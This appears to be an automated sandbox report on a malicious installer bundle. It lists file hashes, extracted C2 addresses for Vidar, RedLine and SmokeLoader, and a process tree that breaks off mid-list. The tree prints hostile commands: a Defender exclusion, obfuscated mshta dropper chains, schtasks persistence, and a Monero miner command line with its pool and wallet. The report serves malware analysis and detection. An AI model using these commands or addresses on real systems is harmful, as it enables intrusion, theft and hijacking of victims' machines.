Resubmissions

02-12-2021 07:35

211202-je6zgsfge4 10

10-09-2021 20:31

210910-za2rzaaeh3 10

10-09-2021 19:40

210910-ydvmdsdffp 10

10-09-2021 12:06

210910-n9s4bsdbep 10

10-09-2021 05:37

210910-gbjcxahdh2 10

09-09-2021 22:16

210909-17av7aghb7 10

09-09-2021 22:12

210909-14mqksgha9 10

09-09-2021 22:12

210909-14l42sgha8 10

09-09-2021 22:11

210909-14e1qsgha7 10

09-09-2021 22:11

210909-138lnacacn 10

Analysis

  • max time kernel
    30s
  • max time network
    167s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-09-2021 21:57

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    6d18c8e8ab9051f7a70b89ff7bb0ec35

  • SHA1

    265311e2afd9f59e824f4b77162cf3dfa278eb7e

  • SHA256

    8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d

  • SHA512

    249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • rl_trojan 1 IoCs

    redline stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

    suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Tnega Activity (GET)

    suricata: ET MALWARE Win32/Tnega Activity (GET)

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 37 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:3476
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1296
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1552
            • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu219d5fe8cf316.exe
              Thu219d5fe8cf316.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3560
              • C:\ProgramData\4001279.exe
                "C:\ProgramData\4001279.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4772
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 4772 -s 1956
                  7⤵
                  • Program crash
                  PID:6980
              • C:\ProgramData\497603.exe
                "C:\ProgramData\497603.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4872
                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:200
              • C:\ProgramData\1342464.exe
                "C:\ProgramData\1342464.exe"
                6⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:4720
              • C:\ProgramData\5283265.exe
                "C:\ProgramData\5283265.exe"
                6⤵
                • Executes dropped EXE
                PID:4328
              • C:\ProgramData\5477419.exe
                "C:\ProgramData\5477419.exe"
                6⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:5140
              • C:\ProgramData\3060877.exe
                "C:\ProgramData\3060877.exe"
                6⤵
                • Executes dropped EXE
                PID:5224
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3572
            • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21624565bb917a.exe
              Thu21624565bb917a.exe
              5⤵
              • Executes dropped EXE
              PID:520
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe
            4⤵
              PID:4072
              • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21a1ef054cac78a.exe
                Thu21a1ef054cac78a.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1984
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  6⤵
                    PID:6032
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      7⤵
                      • Kills process with taskkill
                      PID:5136
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2280
                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu2164f292a11ce.exe
                  Thu2164f292a11ce.exe
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:3892
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Thu21b93295136197.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2096
                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21b93295136197.exe
                  Thu21b93295136197.exe
                  5⤵
                  • Executes dropped EXE
                  PID:580
                  • C:\Users\Admin\AppData\Local\Temp\is-8HK5N.tmp\Thu21b93295136197.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-8HK5N.tmp\Thu21b93295136197.tmp" /SL5="$40048,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21b93295136197.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of FindShellTrayWindow
                    PID:4300
                    • C:\Users\Admin\AppData\Local\Temp\is-FAC7P.tmp\Setup.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-FAC7P.tmp\Setup.exe" /Verysilent
                      7⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      PID:3252
                      • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                        "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                        8⤵
                          PID:7420
                          • C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                            "C:\Users\Admin\AppData\Local\Temp\BSKR.exe"
                            9⤵
                              PID:7540
                              • C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                10⤵
                                  PID:6560
                              • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
                                9⤵
                                  PID:7308
                                  • C:\ProgramData\4061403.exe
                                    "C:\ProgramData\4061403.exe"
                                    10⤵
                                      PID:7796
                                    • C:\ProgramData\1052930.exe
                                      "C:\ProgramData\1052930.exe"
                                      10⤵
                                        PID:6392
                                      • C:\ProgramData\6391176.exe
                                        "C:\ProgramData\6391176.exe"
                                        10⤵
                                          PID:8164
                                        • C:\ProgramData\3634935.exe
                                          "C:\ProgramData\3634935.exe"
                                          10⤵
                                            PID:6756
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\ProgramData\3634935.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\3634935.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                              11⤵
                                                PID:7152
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\3634935.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\3634935.exe" ) do taskkill /Im "%~NxB" /F
                                                  12⤵
                                                    PID:6664
                                                    • C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE
                                                      GZ9~4QZ~O.EXe -P6_oIH__Ioj5q
                                                      13⤵
                                                        PID:3244
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                                          14⤵
                                                            PID:6504
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F
                                                              15⤵
                                                                PID:4576
                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                              "C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S
                                                              14⤵
                                                                PID:5580
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /Im "3634935.exe" /F
                                                              13⤵
                                                              • Kills process with taskkill
                                                              PID:2192
                                                      • C:\ProgramData\4877573.exe
                                                        "C:\ProgramData\4877573.exe"
                                                        10⤵
                                                          PID:7360
                                                        • C:\ProgramData\2305528.exe
                                                          "C:\ProgramData\2305528.exe"
                                                          10⤵
                                                            PID:640
                                                        • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                                          9⤵
                                                            PID:4464
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /c cmd < Cerchia.vsdx
                                                              10⤵
                                                                PID:5976
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd
                                                                  11⤵
                                                                    PID:6688
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
                                                                      12⤵
                                                                        PID:2036
                                                                      • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                        Impedire.exe.com I
                                                                        12⤵
                                                                          PID:7180
                                                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                            C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                            13⤵
                                                                              PID:6936
                                                                              • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                14⤵
                                                                                  PID:5316
                                                                                  • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                    C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                    15⤵
                                                                                      PID:6936
                                                                                      • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                        16⤵
                                                                                          PID:8156
                                                                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                            C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                            17⤵
                                                                                              PID:7504
                                                                                              • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                18⤵
                                                                                                  PID:8156
                                                                                                  • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                    C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                    19⤵
                                                                                                      PID:8548
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping localhost
                                                                                        12⤵
                                                                                        • Runs ping.exe
                                                                                        PID:5256
                                                                                • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                                                  9⤵
                                                                                    PID:6828
                                                                                • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                  "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                  8⤵
                                                                                    PID:7436
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-T0COV.tmp\stats.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-T0COV.tmp\stats.tmp" /SL5="$8004E,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                      9⤵
                                                                                        PID:7600
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe
                                                                              4⤵
                                                                                PID:2060
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21b9847cb6727.exe
                                                                                  Thu21b9847cb6727.exe
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3468
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe
                                                                                4⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2180
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu2156de5489c19.exe
                                                                                  Thu2156de5489c19.exe
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:804
                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpE11E_tmp.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\tmpE11E_tmp.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    PID:5116
                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                      dllhost.exe
                                                                                      7⤵
                                                                                        PID:2268
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c cmd < Attesa.wmv
                                                                                        7⤵
                                                                                          PID:2288
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd
                                                                                            8⤵
                                                                                              PID:5612
                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
                                                                                                9⤵
                                                                                                  PID:4884
                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                  Adorarti.exe.com u
                                                                                                  9⤵
                                                                                                    PID:6264
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                      10⤵
                                                                                                        PID:7056
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                          11⤵
                                                                                                            PID:6088
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                              12⤵
                                                                                                                PID:7024
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                  13⤵
                                                                                                                    PID:2436
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                      14⤵
                                                                                                                        PID:6952
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                          15⤵
                                                                                                                            PID:6456
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                              16⤵
                                                                                                                                PID:6552
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                  17⤵
                                                                                                                                    PID:6664
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                      18⤵
                                                                                                                                        PID:640
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                          19⤵
                                                                                                                                            PID:7016
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                              20⤵
                                                                                                                                                PID:7092
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                  21⤵
                                                                                                                                                    PID:3916
                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                            ping localhost
                                                                                                                            9⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:6732
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1772
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21df5caa1b78de6.exe
                                                                                                                    Thu21df5caa1b78de6.exe /mixone
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:3304
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 656
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4780
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 672
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4120
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 676
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5316
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 680
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5532
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 888
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4652
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 936
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5196
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 1108
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4724
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe
                                                                                                                  4⤵
                                                                                                                    PID:3836
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu21568b0ab8.exe
                                                                                                                      Thu21568b0ab8.exe
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2036
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4940
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4168
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                            8⤵
                                                                                                                              PID:7064
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                9⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:5320
                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                              8⤵
                                                                                                                                PID:6928
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                  9⤵
                                                                                                                                    PID:7980
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                      10⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:4860
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                    9⤵
                                                                                                                                      PID:1808
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                      9⤵
                                                                                                                                        PID:5736
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:652
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 652 -s 1528
                                                                                                                                      8⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:3360
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2200
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DVORAK.exe
